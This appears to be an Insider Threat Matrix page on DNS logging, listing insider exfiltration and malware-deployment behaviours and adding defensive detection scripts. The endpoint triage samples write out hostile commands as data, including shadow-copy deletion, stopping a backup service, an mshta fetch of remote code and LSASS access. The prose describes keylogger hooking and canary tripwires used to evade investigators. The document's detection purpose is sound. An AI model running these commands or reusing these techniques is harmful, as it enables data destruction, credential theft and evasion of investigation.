
Insider Threat Matrix™
  • ID: DT051
  • Created: 08th June 2024
  • Updated: 17th June 2024
  • Platforms: Windows, Linux, macOS
  • Contributor: The ITM Team

DNS Logging

Logging DNS queries made by corporate devices helps identify which web resources a system attempted to reach, and when. A query shows only that a name was resolved, not that content was transferred, so DNS records are most useful when correlated with proxy, firewall or endpoint logs. Clients that use encrypted DNS (DNS over HTTPS or DNS over TLS) to an external resolver bypass resolver-side logging unless that traffic is blocked or redirected to the corporate resolver.

Sections

ME006 Web Access

A subject can access the web with an organization device.

IF001 Exfiltration via Web Service

A subject uses an existing, legitimate external web service to exfiltrate data.

IF027 Installing Malicious Software

The subject deliberately or inadvertently introduces malicious software (commonly referred to as malware) into the organization’s environment. This may occur via manual execution, automated dropper delivery, browser‑based compromise, USB usage, or sideloading through legitimate processes. Malicious software includes trojans, keyloggers, ransomware, credential stealers, remote access tools (RATs), persistence frameworks, or other payloads designed to cause harm, exfiltrate data, degrade systems, or maintain unauthorized control.

 

Installation of malicious software represents a high-severity infringement, regardless of whether the subject's intent was deliberate or negligent. In some cases, malware introduction is the culmination of prior behavioral drift (e.g. installing unapproved tools or disabling security controls), while in others it may signal malicious preparation or active compromise.

 

This Section is distinct from general “Installing Unapproved Software”, which covers non‑malicious or policy-violating tools. Here, the software itself is malicious in purpose or impact, even if delivered under benign pretenses.

ME006.001 Webmail

A subject can access personal webmail services in a browser.

ME006.002 Cloud Storage

A subject can access personal cloud storage in a browser.

ME006.003 Inappropriate Websites

A subject can access websites containing inappropriate content.

ME006.004 Note-Taking Websites

A subject can access external note-taking websites (such as Evernote).

ME006.005 Messenger Services

A subject can access external messenger web-applications with the ability to transmit data and/or files.

IF001.001 Exfiltration via Cloud Storage

A subject uses a cloud storage service, such as Dropbox, OneDrive, or Google Drive to exfiltrate data. They will then access that service again on another device to retrieve the data. Examples include (URLs have been sanitized):

  • hxxps://www.dropbox[.]com
  • hxxps://drive.google[.]com
  • hxxps://onedrive.live[.]com
  • hxxps://mega[.]nz
  • hxxps://www.icloud[.]com/iclouddrive
  • hxxps://www.pcloud[.]com

ME006.006 Code Repositories

A subject can access websites used to access or manage code repositories.

AF004.001 Clear Chrome Artifacts

A subject clears Google Chrome browser artifacts to hide evidence of their activities, such as visited websites, cache, cookies, and download history.

AF004.003 Clear Firefox Artifacts

A subject clears Mozilla Firefox browser artifacts to hide evidence of their activities, such as visited websites, cache, cookies, and download history.

AF004.002 Clear Edge Artifacts

A subject clears Microsoft Edge browser artifacts to hide evidence of their activities, such as visited websites, cache, cookies, and download history.

ME006.007 Text Storage Websites

A subject can access external text storage websites, such as Pastebin.

AF018.003 Canary Tokens

A subject uses files with canary tokens as a tripwire mechanism to detect the presence of security personnel or investigation activities within a compromised environment. This method involves strategically placing files embedded with special identifiers (canary tokens) that trigger alerts when accessed. For example:

 

The subject creates files containing canary tokens—unique identifiers that generate an alert when they are accessed, opened, or modified. These files can appear as regular documents, logs, configurations, or other items that might attract the attention of an investigator during a security response.

 

The subject strategically places these files in various locations within the environment:

  • Endpoints: Files with canary tokens are placed in directories where digital forensics or malware analysis is likely to start, such as log directories, user profile folders, or paths referenced by registry entries.
  • Cloud Storage: The files are uploaded to cloud storage buckets, virtual machines, or application databases where security teams might search for indicators of compromise.
  • Network Shares: Shared drives and network locations where forensic investigators or security tools may perform scans.

 

Once in place, each canary file acts as a silent tripwire: when the file is opened, the application rendering it fetches an embedded remote resource, and that request is what raises the alert:

  • Access Detection: If a security tool, administrator, or investigator attempts to open, modify, or copy the file, the embedded canary token sends an alert to an external server controlled by the subject.
  • Network Traffic: The token can initiate an outbound network request (e.g., HTTP, DNS) to a specified location, notifying the subject of the exact time and environment where the access occurred.
  • Behavior Analysis: The subject might include multiple canary files, each with unique tokens, to identify the pattern of investigation, such as the sequence of directories accessed or specific file types of interest to the security team.

 

Upon receiving an alert from a triggered canary token, the subject can take immediate steps to evade detection:

  • Alert the Subject: The canary token sends a covert signal to the subject's designated server or communication channel, notifying them of the potential investigation.
  • Halt Malicious Activity: The subject can use this warning to suspend ongoing malicious actions, such as data exfiltration or command-and-control communications, to avoid further detection.
  • Clean Up Evidence: Scripts can be triggered to delete or alter logs, remove incriminating files, or revert system configurations to their original state, complicating any forensic investigation.
  • Feign Normalcy: The subject can restore or disguise compromised systems to appear as though nothing suspicious has occurred, minimizing signs of tampering.

 

By using files with canary tokens as tripwires, a subject can gain early warning of investigative actions and respond quickly to avoid exposure. This tactic allows them to outmaneuver standard security investigations by leveraging silent alerts that inform them of potential security team activity.

IF001.002 Exfiltration via Code Repository

A subject uses a code repository service, such as GitHub, to exfiltrate data. They will then access that service again on another device to retrieve the data. Examples include (URLs have been sanitized):

  • hxxps://github[.]com
  • hxxps://gitlab[.]com
  • hxxps://bitbucket[.]org
  • hxxps://sourceforge[.]net
  • hxxps://aws.amazon[.]com/codecommit

IF001.005 Exfiltration via Note-Taking Web Services

A subject uploads confidential organization data to a note-taking web service, such as Evernote. The subject can then access the confidential data outside of the organization from another device. Examples include (URLs have been sanitized):

  • hxxps://www.evernote[.]com
  • hxxps://keep.google[.]com
  • hxxps://www.notion[.]so
  • hxxps://www.onenote[.]com
  • hxxps://notebook.zoho[.]com

IF001.003 Exfiltration via Text Storage Sites

A subject uses a text storage service, such as Pastebin, to exfiltrate data. They will then access that service again on another device to retrieve the data. Examples include (URLs have been sanitized):

  • hxxps://pastebin[.]com
  • hxxps://hastebin[.]com
  • hxxps://privatebin[.]net
  • hxxps://controlc[.]com
  • hxxps://rentry[.]co
  • hxxps://dpaste[.]org

IF010.002 Exfiltration via Personal Email

A subject exfiltrates information using a mailbox they own or have access to, either via software or webmail. They will access the conversation at a later date to retrieve information on a different system.

PR026.002 Remote Desktop Web Access

The subject initiates or configures access to a system using Remote Desktop or Remote Assistance via a web browser interface, often through third-party tools or services (e.g., LogMeIn, AnyDesk, Chrome Remote Desktop, Microsoft RD Web Access). This behavior may indicate preparatory actions to facilitate unauthorized remote access, either for a co-conspirator, a secondary device, or future remote exfiltration. Unlike traditional RDP clients, browser-based remote access methods may bypass endpoint controls and often operate over HTTPS, making detection more difficult with traditional monitoring.

 

This method may be used when traditional RDP clients are blocked or monitored, or when the subject intends to evade installed software policies and gain access through externally hosted portals. While some web-based tools require agents to be installed on the target machine, others permit remote viewing or interaction without full installation, particularly when configured in advance.

IF001.007 Exfiltration via Collaboration Platform

A subject uses a cloud collaboration platform, such as Slack, Google Docs, Atlassian Confluence, or Microsoft 365 Online, to exfiltrate data. They will then access that service again on another device to retrieve the data. Examples include (URLs have been sanitized):

 

  • hxxps://docs.google[.]com
  • hxxps://*.slack[.]com (* represents a wildcard, where a workspace name would be present)
  • hxxps://word.cloud[.]microsoft
  • hxxps://excel.cloud[.]microsoft
  • hxxps://powerpoint.cloud[.]microsoft
  • hxxps://*.atlassian[.]net/wiki/ (* represents a wildcard, where a workspace name would be present)
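
The hostnames in the IF001.001, IF001.002, IF001.003, IF001.005 and IF001.007 lists above are exactly what DT051 DNS logging surfaces, so the natural detection is a watchlist match over resolver logs. The script below is an added example, not ITM tooling: it loads the page's hostnames (wildcards such as `*.slack.com` become suffix matches), parses a constructed `key=value` log format that stands in for whatever your resolver writes, and reports which hosts resolved which category of service. The sample log lines, the host names and the extra `content.dropboxapi.com` query are constructed and are not from the page.

```python
"""Match DNS query logs against the exfiltration service hostnames listed on
this page (IF001.001, .002, .003, .005, .007) and report hits per host.

Added example for DT051, not ITM tooling. The log format below is a
constructed key=value line; replace parse_line() with a parser for your
resolver's real format (Windows DNS analytic log, Sysmon event 22, BIND
query log).
"""
import re
from collections import defaultdict

# Hostnames taken from the page's lists. A leading "*." is the page's
# wildcard for a workspace name and is matched as a suffix.
WATCHLIST = {
    "IF001.001 cloud storage": [
        "www.dropbox.com", "drive.google.com", "onedrive.live.com",
        "mega.nz", "www.icloud.com", "www.pcloud.com",
    ],
    "IF001.002 code repository": [
        "github.com", "gitlab.com", "bitbucket.org", "sourceforge.net",
        "aws.amazon.com",  # the /codecommit path is invisible to DNS
    ],
    "IF001.005 note-taking": [
        "www.evernote.com", "keep.google.com", "www.notion.so",
        "www.onenote.com", "notebook.zoho.com",
    ],
    "IF001.003 text storage": [
        "pastebin.com", "hastebin.com", "privatebin.net", "controlc.com",
        "rentry.co", "dpaste.org",
    ],
    "IF001.007 collaboration": [
        "docs.google.com", "*.slack.com", "word.cloud.microsoft",
        "excel.cloud.microsoft", "powerpoint.cloud.microsoft",
        "*.atlassian.net",
    ],
}

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """Parse a constructed 'key=value key=value' log line into a dict."""
    fields = dict(FIELD_RE.findall(line))
    fields["qname"] = fields.get("qname", "").rstrip(".").lower()
    return fields


def match_category(qname):
    """Return the watchlist category for qname, or None.

    Plain entries need an exact match. '*.suffix' entries match any name
    under the suffix but not the bare suffix itself, because the page's
    wildcard always stands for a workspace name.
    """
    for category, patterns in WATCHLIST.items():
        for pattern in patterns:
            if pattern.startswith("*."):
                if qname.endswith(pattern[1:]):
                    return category
            elif qname == pattern:
                return category
    return None


def classify_dns_log(lines):
    """Return {host: {category: [qnames]}} for queries that hit the watchlist.

    Only NOERROR answers are kept: an NXDOMAIN cannot have led to an upload,
    although a burst of NXDOMAINs deserves its own rule.
    """
    hits = defaultdict(lambda: defaultdict(list))
    for line in lines:
        rec = parse_line(line)
        if rec.get("rcode", "NOERROR") != "NOERROR":
            continue
        category = match_category(rec["qname"])
        if category:
            hits[rec.get("host", "?")][category].append(rec["qname"])
    return {host: dict(cats) for host, cats in hits.items()}


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    "ts=2024-06-17T09:01:10Z host=WS-042 qname=www.dropbox.com. qtype=A rcode=NOERROR",
    "ts=2024-06-17T09:01:11Z host=WS-042 qname=content.dropboxapi.com. qtype=A rcode=NOERROR",
    "ts=2024-06-17T09:02:30Z host=WS-042 qname=acme-corp.slack.com. qtype=A rcode=NOERROR",
    "ts=2024-06-17T09:03:05Z host=WS-017 qname=pastebin.com. qtype=A rcode=NOERROR",
    "ts=2024-06-17T09:03:06Z host=WS-017 qname=slack.com. qtype=A rcode=NOERROR",
    "ts=2024-06-17T09:04:00Z host=WS-017 qname=rentry.co. qtype=AAAA rcode=NXDOMAIN",
    "ts=2024-06-17T09:05:00Z host=WS-099 qname=intranet.example.local. qtype=A rcode=NOERROR",
]

if __name__ == "__main__":
    for host, cats in classify_dns_log(SAMPLE_LOG).items():
        for category, names in cats.items():
            print(f"{host}: {category}: {', '.join(names)}")
```

Two things the run shows that the lists alone do not. First, the constructed `content.dropboxapi.com` query is not matched, because the page lists the browser front door and not the API hosts a client uses for the actual upload; a production watchlist should be suffix-based per service and maintained. Second, `docs.google.com` and the `*.cloud.microsoft` names are also what a sanctioned Google Workspace or Microsoft 365 tenant resolves, so a hit in the IF001.007 category is a prompt to pivot to proxy or CASB logs for the tenant and volume, not a finding on its own.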

IF009.007 Installation of Unapproved Browser Extensions

The subject installs browser extensions on a managed device that have not been approved, vetted, or distributed via sanctioned organizational channels. These may include productivity tools, automation agents, data scrapers, content manipulators, or AI-enhanced interfaces. Installations typically originate from GitHub repositories, private developer sites, shared file storage, or sideloading tools that bypass enterprise browser controls.

 

Unapproved extensions introduce unmonitored execution environments directly into the subject’s browser, enabling silent access to sensitive web applications, stored credentials, and internal content. Many request expansive permissions (e.g., webRequest, cookies, tabs, clipboardRead) and operate with persistent background scripts that are difficult to detect through normal endpoint monitoring.

 

This behavior violates Acceptable Use Policies and, depending on the extension’s behavior, may also constitute unauthorized access, data exfiltration, or malware introduction. Some extensions—particularly those hosted on GitHub or distributed through Telegram groups or developer forums—have been found to contain obfuscated payloads, embedded credential harvesters, or cryptojacking modules.

 

Examples include:

 

  • Installing a GitHub-hosted ChatGPT sidebar extension that silently logs visited URLs and API keys used in developer consoles.
  • Deploying a YouTube downloader that injects scripts for ad click fraud or SEO manipulation.
  • Using a browser extension to auto-fill forms with personal data, which transmits data to offshore analytics servers.
  • Loading unpacked or custom extensions that disguise themselves as utilities but include base64-encoded malware installers.

 

While subjects may initially claim curiosity or productivity needs, repeated installation of unapproved extensions—especially after prior enforcement—may indicate normalization of risky behavior or active circumvention of controls.
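
A practical check for this sub-section is an inventory of what is actually loaded in the browser profile. The script below is an added example and is not ITM or Chromium code. It inspects the two artefacts a real audit reads from a Chromium profile directory, the `Preferences` JSON (`extensions.settings.<id>.location` and `.path`) and each extension's `manifest.json`, flagging extensions that were loaded unpacked or from the command line rather than from the store, and unapproved extensions that hold the permissions the page names (`webRequest`, `cookies`, `tabs`, `clipboardRead`) or all-hosts access. The numeric location codes are from Chromium's `Manifest::Location` enum and should be confirmed against the version you audit; the extension IDs, names, paths and the approved-ID set are constructed.

```python
"""Audit a Chromium profile's extension inventory for sideloaded installs and
high-risk permissions (IF009.007). Added example; not ITM or Chromium code.
Both inputs below are constructed in memory rather than read from disk.
"""
import json

# Chromium Manifest::Location codes (assumption: confirm against the browser
# version you audit). 1 = INTERNAL (installed from the store), 4 = UNPACKED
# ("Load unpacked" in developer mode), 5 = COMPONENT (built into the browser),
# 8 = COMMAND_LINE (--load-extension), 9 = EXTERNAL_POLICY (admin deployed).
LOCATION_NAMES = {1: "store", 4: "unpacked", 5: "component", 8: "command_line", 9: "policy"}
SIDELOADED = {4, 8}

# Permissions the page names plus a few of similar impact (assumption: tune
# to your own policy).
RISKY_PERMISSIONS = {"webRequest", "webRequestBlocking", "cookies", "tabs",
                     "clipboardRead", "history", "nativeMessaging", "debugger"}


def broad_host(pattern):
    """True for host patterns that grant access to every site."""
    return pattern in ("<all_urls>", "*://*/*", "http://*/*", "https://*/*")


def audit_extensions(preferences_json, manifests, approved_ids=frozenset()):
    """Return one finding per extension that is sideloaded, or unapproved
    with risky permissions, or both.

    preferences_json: contents of the profile's Preferences file.
    manifests: extension id -> parsed manifest.json (MV2 puts host patterns
    in "permissions"; MV3 puts them in "host_permissions"; both are read).
    """
    settings = json.loads(preferences_json).get("extensions", {}).get("settings", {})
    findings = []
    for ext_id, meta in settings.items():
        location = meta.get("location")
        if location == 5:  # component extensions ship with the browser
            continue
        manifest = manifests.get(ext_id, {})
        declared = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
        risky = sorted(p for p in declared if p in RISKY_PERMISSIONS or broad_host(p))
        reasons = []
        if location in SIDELOADED:
            reasons.append("sideloaded:" + LOCATION_NAMES.get(location, f"location={location}"))
        if ext_id not in approved_ids and risky:
            reasons.append("unapproved with risky permissions")
        if reasons:
            findings.append({"id": ext_id, "name": manifest.get("name", "?"),
                             "path": meta.get("path", "?"), "risky": risky,
                             "reasons": reasons})
    return findings


# Constructed sample data: IDs, names and paths are placeholders.
SAMPLE_PREFERENCES = json.dumps({"extensions": {"settings": {
    "aaaabbbbccccddddeeeeffffgggghhhh": {"location": 1, "path": "aaaabbbbccccddddeeeeffffgggghhhh\\1.4.0_0"},
    "ppppoooonnnnmmmmllllkkkkjjjjiiii": {"location": 4, "path": "C:\\Users\\jdoe\\Downloads\\gpt-sidebar"},
    "bbbbccccddddeeeeffffgggghhhhiiii": {"location": 1, "path": "bbbbccccddddeeeeffffgggghhhhiiii\\2.0.1_0"},
    "ccccddddeeeeffffgggghhhhiiiijjjj": {"location": 5, "path": "resources\\pdf"},
}}})
SAMPLE_MANIFESTS = {
    "aaaabbbbccccddddeeeeffffgggghhhh": {"name": "Corporate Vault", "manifest_version": 3,
                                         "permissions": ["storage", "tabs"],
                                         "host_permissions": ["https://vault.example.com/*"]},
    "ppppoooonnnnmmmmllllkkkkjjjjiiii": {"name": "ChatGPT Sidebar", "manifest_version": 2,
                                         "permissions": ["tabs", "webRequest", "<all_urls>"]},
    "bbbbccccddddeeeeffffgggghhhhiiii": {"name": "Form Filler Pro", "manifest_version": 3,
                                         "permissions": ["cookies", "clipboardRead"],
                                         "host_permissions": ["*://*/*"]},
    "ccccddddeeeeffffgggghhhhiiiijjjj": {"name": "PDF Viewer", "permissions": []},
}
APPROVED_IDS = frozenset({"aaaabbbbccccddddeeeeffffgggghhhh"})

if __name__ == "__main__":
    for f in audit_extensions(SAMPLE_PREFERENCES, SAMPLE_MANIFESTS, APPROVED_IDS):
        print(f"{f['name']} ({f['id']}) at {f['path']}: {', '.join(f['reasons'])}; "
              f"permissions of concern: {', '.join(f['risky']) or 'none'}")
```

Run it against every profile under the browser's user data directory; Chromium-based Edge uses the same `Preferences` and `Extensions` layout under its own user data path. Note that the approved vault extension also holds `tabs`, which is why approval is keyed on extension ID rather than on the permission set alone: the question is whether this particular build was vetted, not whether the permission exists.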

ME001.001 Access to Asset Past Termination

The subject accesses a corporate hardware asset, most commonly a laptop or corporate mobile device, after their employment has formally ended. This typically occurs due to gaps in deprovisioning, delayed hardware recovery, or the subject physically retaining the device despite offboarding procedures. Post-termination access may be opportunistic or intentional, and may precede or coincide with data exfiltration, sabotage, or unauthorized continuation of internal access.

 

This sub-section is relevant in cases where the hardware asset is no longer linked to an active identity in HR systems but remains technically functional and capable of network, VPN, or service access. Such access undermines the assumption that termination alone revokes operational capability and may point to procedural drift in IT, HR, or facilities handover workflows.

ME001.002 Purchase and Use of Unmanaged Corporate Hardware

The subject purchases a laptop (or similar endpoint) using a corporate payment method but does so outside established procurement and provisioning processes. By bypassing IT and asset management workflows, the subject introduces a corporate-funded but unmanaged device into the environment.

 

Such devices often lack standard security controls—such as endpoint detection and response (EDR), encryption, configuration baselines, or patching—and may not be tracked in asset inventory systems. While the subject may rationalize the purchase as operationally necessary (e.g., urgency, convenience, or perceived lack of IT responsiveness), the result is a sanctioned but invisible device with the potential to bypass monitoring and governance controls.

 

This behavior undermines organizational asset control, complicates investigative attribution, and introduces unmanaged endpoints capable of accessing sensitive networks and data.

IF027.001 Infostealer Deployment

The subject deploys credential-harvesting malware (commonly referred to as an infostealer) to extract sensitive authentication material or session artifacts from systems under their control. These payloads are typically configured to capture data from browser credential stores (e.g., Login Data SQLite databases in Chromium-based browsers), password vaults (e.g., KeePass, 1Password), clipboard buffers, Windows Credential Manager, or the Local Security Authority Subsystem Service (LSASS) memory space.

 

Infostealers may be executed directly via compiled binaries, staged through malicious document macros, or loaded reflectively into memory using PowerShell, .NET assemblies, or process hollowing techniques. Some variants are fileless and reside entirely in memory, while others create persistence via registry keys (e.g., HKCU\Software\Microsoft\Windows\CurrentVersion\Run) or scheduled tasks.

 

While often associated with external threat actors, insider deployment of infostealers allows subjects to bypass authentication safeguards, impersonate peers, or exfiltrate internal tokens for later use or sale. In cases where data is not immediately exfiltrated, local staging (e.g., in %AppData%, %Temp%, or encrypted containers) may indicate an intent to transfer data offline or deliver it via alternate channels.

IF027.002 Ransomware Deployment

The subject deploys ransomware within the organization’s environment, resulting in the encryption, locking, or destructive alteration of organizational data, systems, or backups. Ransomware used by insiders may be obtained from public repositories, affiliate programs (e.g. RaaS platforms), or compiled independently using commodity builder kits. Unlike external actors who rely on phishing or remote exploitation, insiders often bypass perimeter controls by detonating ransomware from within trusted systems using local access.

 

Ransomware payloads are typically compiled as executables, occasionally obfuscated using packers or crypters to evade detection. Execution may be initiated via command-line, scheduled task, script wrapper, or automated loader. Encryption routines often target common file extensions recursively across accessible volumes, mapped drives, and cloud sync folders. In advanced deployments, the subject may disable volume shadow copies (vssadmin delete shadows) or stop backup agents (net stop) prior to detonation to increase impact.

 

In some insider scenarios, ransomware is executed selectively: targeting specific departments, shares, or systems, rather than broad detonation. This behavior may indicate intent to send a message, sabotage selectively, or avoid attribution. Payment demands may be issued internally, externally, or omitted entirely if disruption is the primary motive.

IF027.003 Keylogger Deployment

The subject deploys software designed to record keystrokes entered on an endpoint to capture credentials, sensitive communications, internal documentation, or intellectual property. Keyloggers may be introduced as standalone binaries, embedded within otherwise legitimate tools, or configured through dual-use frameworks (e.g. C++ dropper with keylogging module). In insider scenarios, the deployment is typically local and deliberate, leveraging the subject’s physical access or assigned privileges to bypass existing controls.

 

Keyloggers operate in one of several modes:

 

  • Kernel-based: Install a filter driver in the keyboard class driver stack (above Kbdclass.sys) to capture scan codes in kernel mode, before any user-mode application or hook sees them.
  • User-mode: Install a low-level keyboard hook with SetWindowsHookEx (WH_KEYBOARD_LL) or poll GetAsyncKeyState, and call GetForegroundWindow to attribute each keystroke to the active window or process.
  • Form grabbers: Intercept browser or GUI form data at submission time, before it is TLS-encrypted, so transport encryption does not protect the captured fields.
  • Clipboard and screen scrapers: Supplement keylogging with capture of copied content and periodic screenshots for context.

 

Captured data is typically written to local files, often encrypted, in locations such as %TEMP%, %APPDATA% or hidden directories, and periodically exfiltrated via email, FTP, HTTP POST or removable storage.

IF027.004 Remote Access Tool (RAT) Deployment

The subject deploys a Remote Access Tool (RAT): a software implant that provides covert, persistent remote control of an endpoint or server—enabling continued unauthorized access, monitoring, or post-employment re-entry. Unlike sanctioned remote administration platforms, RATs are deployed without organizational oversight and are often configured to obfuscate their presence, evade detection, or blend into legitimate activity.

 

RATs deployed by insiders may be off-the-shelf tools (e.g. njRAT, Quasar, Remcos), lightly modified open-source frameworks (e.g. Havoc, Pupy), or commercial remote-support products repurposed for unsanctioned use (e.g. AnyDesk or TeamViewer configured for unattended access and hidden from the logged-on user).

 

Functionality typically includes:

 

  • Full GUI or shell access
  • File system interaction
  • Screenshot and webcam capture
  • Credential harvesting
  • Process and registry manipulation
  • Optional keylogging and persistence modules

 

Deployment methods include manual installation, script-wrapped droppers, DLL side-loading, or execution via LOLBins (mshta, rundll32). Persistence is typically achieved through scheduled tasks, registry run keys, or disguised service installations. In some cases, the RAT may be configured to activate only during specific windows or respond to remote beacons, reducing exposure to detection.
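
The IF027 sub-sections above name concrete host-level indicators: `vssadmin delete shadows` and `net stop` against backup agents (IF027.002), `mshta` and `rundll32` launching remote content (IF027.004), persistence through `HKCU\...\CurrentVersion\Run` keys and scheduled tasks (IF027.001, IF027.004), and access to LSASS memory (IF027.001). The script below is an added example, not ITM tooling, that turns those indicators into rules and runs them over constructed endpoint events shaped like Sysmon process-create, registry-set and process-access records. The LSASS allowlist prefixes, the backup service name hints, the user and path names, and the address 198.51.100.7 (documentation range) are all assumptions made for the sample.

```python
"""Rule-based triage of endpoint telemetry for the IF027 indicators this page
names. Added example, not ITM tooling. Events are constructed dicts; map your
real field names onto "image", "cmd", "target" and "source".
"""

# Assumption: only images under these prefixes legitimately open LSASS
# (OS components, EDR). Keep it tight; a broad allowlist hides the attack.
LSASS_ALLOW_PREFIXES = ("c:\\windows\\system32\\", "c:\\program files\\")
# Assumption: substrings that identify backup or snapshot services locally.
BACKUP_SERVICE_HINTS = ("backup", "vss", "veeam")


def _lower(event, *keys):
    return {k: event.get(k, "").lower() for k in keys}


def shadow_copy_deleted(e):
    x = _lower(e, "image", "cmd")
    return x["image"].endswith("\\vssadmin.exe") and "delete shadows" in x["cmd"]


def backup_service_stopped(e):
    x = _lower(e, "image", "cmd")
    return (x["image"].endswith(("\\net.exe", "\\net1.exe"))
            and "stop" in x["cmd"].split()
            and any(h in x["cmd"] for h in BACKUP_SERVICE_HINTS))


def lolbin_remote_content(e):
    x = _lower(e, "image", "cmd")
    return (x["image"].endswith(("\\mshta.exe", "\\rundll32.exe"))
            and any(m in x["cmd"] for m in ("http://", "https://", "javascript:")))


def scheduled_task_created(e):
    x = _lower(e, "image", "cmd")
    return x["image"].endswith("\\schtasks.exe") and "/create" in x["cmd"]


def run_key_written(e):
    # Also catches RunOnce and RunServices under the same CurrentVersion key.
    return "\\currentversion\\run" in e.get("target", "").lower()


def lsass_accessed(e):
    x = _lower(e, "source", "target")
    return (x["target"].endswith("\\lsass.exe")
            and not x["source"].startswith(LSASS_ALLOW_PREFIXES))


# (event type, ITM section, rule name, predicate)
RULES = [
    ("process", "IF027.002", "shadow copies deleted", shadow_copy_deleted),
    ("process", "IF027.002", "backup service stopped", backup_service_stopped),
    ("process", "IF027.004", "LOLBin loading remote content", lolbin_remote_content),
    ("process", "IF027.004", "scheduled task created", scheduled_task_created),
    ("registry", "IF027.001", "run key persistence", run_key_written),
    ("process_access", "IF027.001", "LSASS memory access", lsass_accessed),
]


def triage(events):
    """Return [(section, rule, user, detail)] for every event that matches a
    rule of its type, in input order."""
    findings = []
    for e in events:
        for etype, section, name, pred in RULES:
            if e.get("type") == etype and pred(e):
                findings.append((section, name, e.get("user", "?"),
                                 e.get("cmd") or e.get("target")))
    return findings


# Constructed sample events; none of these were observed on a real system.
SAMPLE_EVENTS = [
    {"type": "process", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin delete shadows /all /quiet"},
    {"type": "process", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\net.exe",
     "cmd": "net stop AcmeBackupAgent"},
    {"type": "process", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta https://198.51.100.7/update.hta"},
    {"type": "process", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"type": "registry", "user": r"CORP\jdoe", "image": r"C:\Users\jdoe\AppData\Roaming\svc.exe",
     "target": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"type": "process_access", "user": r"CORP\jdoe", "source": r"C:\Users\jdoe\AppData\Local\Temp\x.exe",
     "target": r"C:\Windows\system32\lsass.exe"},
    {"type": "process_access", "user": r"NT AUTHORITY\SYSTEM", "source": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\Windows\system32\lsass.exe"},
    {"type": "process", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\notepad.exe",
     "cmd": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for section, rule, user, detail in triage(SAMPLE_EVENTS):
        print(f"[{section}] {rule}: {user}: {detail}")
```

Five of the eight sample events fire; the benign `rundll32` control-panel launch and the `svchost.exe` access to LSASS do not. Each rule is deliberately narrow to the indicator the page names, which is the right starting point for an insider case where the subject already has local access and the question is which of several documented sabotage or credential-theft steps occurred, rather than a general malware heuristic.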